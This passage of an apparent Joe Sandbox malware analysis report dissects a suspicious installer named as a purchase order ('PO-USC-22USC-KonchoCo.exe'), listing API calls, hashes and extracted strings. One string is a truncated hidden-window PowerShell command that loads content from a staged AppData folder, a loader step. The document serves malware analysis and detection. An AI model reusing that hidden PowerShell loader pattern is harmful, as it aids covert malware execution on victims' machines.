                                                        • Opcode Fuzzy Hash: a1d13c5b68b43feb2506ad2660f88dc7f5461ef8ac70b9f67d62976f64309ddb
                                                        • Instruction Fuzzy Hash: 7FA00176544900ABCA16AB50EF0980ABB72BBA8701B5288B9A285610348BB25821FB19
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 00405707: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000,?), ref: 0040573F
                                                          • Part of subcall function 00405707: lstrlenW.KERNEL32(004030AD,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030AD,00000000), ref: 0040574F
                                                          • Part of subcall function 00405707: lstrcatW.KERNEL32(Completed,004030AD), ref: 00405762
                                                          • Part of subcall function 00405707: SetWindowTextW.USER32(Completed,Completed), ref: 00405774
                                                          • Part of subcall function 00405707: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040579A
                                                          • Part of subcall function 00405707: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057B4
                                                          • Part of subcall function 00405707: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057C2
                                                          • Part of subcall function 00405C65: CreateProcessW.KERNELBASE(00000000,0042C800,00000000,00000000,00000000,04000000,00000000,00000000,00425F50,?,?,?,0042C800,?), ref: 00405C8E
                                                          • Part of subcall function 00405C65: CloseHandle.KERNEL32(?,?,?,0042C800,?), ref: 00405C9B
                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FF0
                                                          • Part of subcall function 00406B21: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406B32
                                                          • Part of subcall function 00406B21: GetExitCodeProcess.KERNEL32(?,?), ref: 00406B54
                                                          • Part of subcall function 004065C9: wsprintfW.USER32 ref: 004065D6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                        • String ID:
                                                        • API String ID: 2972824698-0
                                                        • Opcode ID: 26d50f179d8fc8cde647217e16b8c843d809a43f18d9577a6fed63db6197872c
                                                        • Instruction ID: ba3ed7a1875ec382e1b93905bcfefb33a8222a1057eccf936486356e32fab672
                                                        • Opcode Fuzzy Hash: 26d50f179d8fc8cde647217e16b8c843d809a43f18d9577a6fed63db6197872c
                                                        • Instruction Fuzzy Hash: 48F06D32905125EBDB20BBE599C59DE76F59B00318F25413FE102B21E1CB7C4E459A6E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDlgItem.USER32(?,000003FB), ref: 00404B41
                                                        • SetWindowTextW.USER32(00000000,?), ref: 00404B6B
                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00404C1C
                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404C27
                                                        • lstrcmpiW.KERNEL32(: Completed,00422F48,00000000,?,?), ref: 00404C59
                                                        • lstrcatW.KERNEL32(?,: Completed), ref: 00404C65
                                                        • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C77
                                                          • Part of subcall function 00405CC6: GetDlgItemTextW.USER32(?,?,00000400,00404CAE), ref: 00405CD9
                                                          • Part of subcall function 00406930: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 00406993
                                                          • Part of subcall function 00406930: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004069A2
                                                          • Part of subcall function 00406930: CharNextW.USER32(?,"C:\Users\user\Desktop\PO-USC-22USC-KonchoCo.exe",74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069A7
                                                          • Part of subcall function 00406930: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,00000000,00403620,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040392F,?,00000008,0000000A,0000000C), ref: 004069BA
                                                        • GetDiskFreeSpaceW.KERNEL32(00420F18,?,?,0000040F,?,00420F18,00420F18,?,00000001,00420F18,?,?,000003FB,?), ref: 00404D3A
                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D55
                                                          • Part of subcall function 00404EAE: lstrlenW.KERNEL32(00422F48,00422F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F4F
                                                          • Part of subcall function 00404EAE: wsprintfW.USER32 ref: 00404F58
                                                          • Part of subcall function 00404EAE: SetDlgItemTextW.USER32(?,00422F48), ref: 00404F6B
                                                        Strings
                                                        • C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238, xrefs: 00404C42
                                                        • A, xrefs: 00404C15
                                                        • H/B, xrefs: 00404BEF
                                                        • "powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\A, xrefs: 00404B0B
                                                        • : Completed, xrefs: 00404C53, 00404C58, 00404C63
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: "powershell.exe" -windowstyle hidden "$Moralioralist=Get-Content 'C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\A$: Completed$A$C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238$H/B
                                                        • API String ID: 2624150263-3949055606
                                                        • Opcode ID: 4cf00c73115f53cf57be461a99467e832b164710fce0f00c931b90381e9749c6
                                                        • Instruction ID: 96009b05525636a0bc85a96efb184481c484ec56fefee2337862baa2afa4bf02
                                                        • Opcode Fuzzy Hash: 4cf00c73115f53cf57be461a99467e832b164710fce0f00c931b90381e9749c6
                                                        • Instruction Fuzzy Hash: DDA173B1900209ABDB11AFA5CD45AEFB7B8EF84314F11843BF601B62D1D77C99418B6D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CoCreateInstance.OLE32(004084DC,?,00000001,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                                        Strings
                                                        • C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes, xrefs: 0040226E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: CreateInstance
                                                        • String ID: C:\Users\user\AppData\Roaming\brosy\udrulnings\Depravingly238\Schokker\Alkoholeksperter\styrtning\Tedeummernes
                                                        • API String ID: 542301482-2643801205
                                                        • Opcode ID: 5b0014f3340ed2e8e047bae132ec64f51d2c526b3404a8b2a52325da7d94e0b0
                                                        • Instruction ID: 6031f0b9305bb7b05064ab4f17c9904609ff1c452577966f293784d012f03e0b
                                                        • Opcode Fuzzy Hash: 5b0014f3340ed2e8e047bae132ec64f51d2c526b3404a8b2a52325da7d94e0b0
                                                        • Instruction Fuzzy Hash: 4A410475A00209AFCB40DFE4C989EAD7BB5BF48308B20457EF505EB2D1DB799982CB54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: FileFindFirst
                                                        • String ID:
                                                        • API String ID: 1974802433-0
                                                        • Opcode ID: 209a06d9c3b4454fc5c1ff69253149a6aac46e41fe78177cd59690df36c1804c
                                                        • Instruction ID: f0d7266373870d470beff65cac24d35b4a218527411e0b80208e5fb1e93adf0c
                                                        • Opcode Fuzzy Hash: 209a06d9c3b4454fc5c1ff69253149a6aac46e41fe78177cd59690df36c1804c
                                                        • Instruction Fuzzy Hash: 28F08271A04104AED701EBE4ED499AEB378EF14314F60057BE111F31E0D7B84E059B19
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDlgItem.USER32(?,000003F9), ref: 00405086
                                                        • GetDlgItem.USER32(?,00000408), ref: 00405091
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 004050DB
                                                        • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004050F2
                                                        • SetWindowLongW.USER32(?,000000FC,0040567B), ref: 0040510B
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 0040511F
                                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405131
                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00405147
                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405153
                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405165
                                                        • DeleteObject.GDI32(00000000), ref: 00405168
                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405193
                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 0040519F
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040523A
                                                        • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040526A
                                                          • Part of subcall function 00404636: SendMessageW.USER32(00000028,?,00000001,00404461), ref: 00404644
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040527E
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 004052AC
                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004052BA
                                                        • ShowWindow.USER32(?,00000005), ref: 004052CA
                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 004053C5
                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040542A
                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040543F
                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405463
                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405483
                                                        • ImageList_Destroy.COMCTL32(00000000), ref: 00405498
                                                        • GlobalFree.KERNEL32(00000000), ref: 004054A8
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405521
                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 004055CA
                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055D9
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00405604
                                                        • ShowWindow.USER32(?,00000000), ref: 00405652
                                                        • GetDlgItem.USER32(?,000003FE), ref: 0040565D
                                                        • ShowWindow.USER32(00000000), ref: 00405664
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                        • String ID: $M$N
                                                        • API String ID: 2564846305-813528018
                                                        • Opcode ID: 324c1f4819b082b1ac23898fd696f3744d7b458a05ce4ad4b76fe224fda76cd4
                                                        • Instruction ID: 3eec0fee992af157883e3c32035e614d90e83c27d9cb298499668aae57dc4bf7
                                                        • Opcode Fuzzy Hash: 324c1f4819b082b1ac23898fd696f3744d7b458a05ce4ad4b76fe224fda76cd4
                                                        • Instruction Fuzzy Hash: B4029D70A00608EFDB20DF64CD45AAF7BB5FB44314F10857AE910BA2E0D7B98A42DF18
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040485E
                                                        • GetDlgItem.USER32(?,000003E8), ref: 00404872
                                                        • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040488F
                                                        • GetSysColor.USER32(?), ref: 004048A0
                                                        • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004048AE
                                                        • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004048BC
                                                        • lstrlenW.KERNEL32(?), ref: 004048C1
                                                        • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004048CE
                                                        • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048E3
                                                        • GetDlgItem.USER32(?,0000040A), ref: 0040493C
                                                        • SendMessageW.USER32(00000000), ref: 00404943
                                                        • GetDlgItem.USER32(?,000003E8), ref: 0040496E
                                                        • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004049B1
                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 004049BF
                                                        • SetCursor.USER32(00000000), ref: 004049C2
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004049DB
                                                        • SetCursor.USER32(00000000), ref: 004049DE
                                                        • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404A0D
                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404A1F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                        • String ID: 7G@$: Completed$N
                                                        • API String ID: 3103080414-1841378378
                                                        • Opcode ID: b6dc2905c6216746abb3c0cd17d9c39e8b2e61a9098f8b336cb1d1698ee7a258
                                                        • Instruction ID: cd0ff63a31a53d86839c1a5ce07a34679cc09665db384d3569e6db54912acae5
                                                        • Opcode Fuzzy Hash: b6dc2905c6216746abb3c0cd17d9c39e8b2e61a9098f8b336cb1d1698ee7a258
                                                        • Instruction Fuzzy Hash: 9061B0B1A40209BFDB10AF64CD85EAA7B69FB84305F00843AF605B72D0D779AD51CF98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406463,?,?), ref: 00406303
                                                        • GetShortPathNameW.KERNEL32(?,004265E8,00000400), ref: 0040630C
                                                          • Part of subcall function 004060D7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060E7
                                                          • Part of subcall function 004060D7: lstrlenA.KERNEL32(00000000,?,00000000,004063BC,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406119
                                                        • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 00406329
                                                        • wsprintfA.USER32 ref: 00406347
                                                        • GetFileSize.KERNEL32(00000000,00000000,00426DE8,C0000000,00000004,00426DE8,?,?,?,?,?), ref: 00406382
                                                        • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406391
                                                        • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063C9
                                                        • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004261E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040641F
                                                        • GlobalFree.KERNEL32(00000000), ref: 00406430
                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406437
                                                          • Part of subcall function 00406172: GetFileAttributesW.KERNELBASE(00000003,00403118,00437800,80000000,00000003), ref: 00406176
                                                          • Part of subcall function 00406172: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406198
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                        • String ID: %ls=%ls$[Rename]$eB$mB$mB
                                                        • API String ID: 2171350718-2529913679
                                                        • Opcode ID: db523023045b127196975f0173c88122861a3a00dd6e7a8812d5311d7169504c
                                                        • Instruction ID: 393dc7f902851ea198dcc63c4c4a9d42cf85fc1b4335f85fcc59b0ede2066cac
                                                        • Opcode Fuzzy Hash: db523023045b127196975f0173c88122861a3a00dd6e7a8812d5311d7169504c
                                                        • Instruction Fuzzy Hash: 35313571600325BBD2206B29AD49F6B3A6CDF41744F17003AF902F62D3DA7CD82686BC
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                        • GetClientRect.USER32(?,?), ref: 0040105B
                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                        • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                        • DrawTextW.USER32(00000000,00428A60,000000FF,00000010,00000820), ref: 00401156
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1702485461.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1702434670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702563174.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1702600908.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000044E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1704346344.000000000045A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PO-USC-22USC-KonchoCo.jbxd
                                                        Similarity
                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                        • String ID: F
                                                        • API String ID: 941294808-1304234792
                                                        • Opcode ID: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
                                                        • Instruction ID: 3c33d73dbc2ffdf14e434cca4ae815e9cfbd561affca8d3971a90777bf4c3be5
                                                        • Opcode Fuzzy Hash: 9a1d1952d02a6587733a796de720c08d05f060e36ce2c67ddab1b612aed24319
                                                        • Instruction Fuzzy Hash: 34418B71800249AFCF058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB34DA55DFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
